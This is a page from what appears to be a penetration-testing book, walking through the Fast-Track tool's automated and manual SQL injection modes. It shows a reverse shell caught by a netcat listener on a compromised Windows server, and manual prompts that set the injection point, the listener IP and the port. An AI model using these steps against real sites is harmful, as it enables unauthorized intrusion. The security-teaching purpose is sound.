background image

Fast-Track

167

Sending payload to parameter: txtLogin

Sending payload to parameter: txtPassword

[-] The PAYLOAD is being delivered. This can take up to two minutes. [-]

listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

As you can see, Fast-Track handled the automatic detection of the POST 

parameters and injected the attack, completely compromising the affected 
system via SQL injection. 

NOTE

You can also use FTP to deliver your payload, although FTP is generally blocked on 
outbound-based connections.

Manual Injection

If you have a different IP address listening for the reverse shell or you need 
to fine-tune some of the configuration settings, you can set up the injector 
manually.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack

4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 

4

The manual portion allows you to customize your attack for whatever reason.

You will need to designate where in the URL the SQL Injection is by using 
'INJECTHERE

So for example, when the tool asks you for the SQL Injectable URL, type:

http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter the URL of the susceptible site, remember to put 'INJECTHERE for the 
injectible parameter

Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter here: 

http://www.secmaniac.com/index.asp?id=

'

INJECTHERE&date=2010

 Enter the IP Address of server with NetCat Listening: 

10.211.55.130

 Enter Port number with NetCat listening: 

9090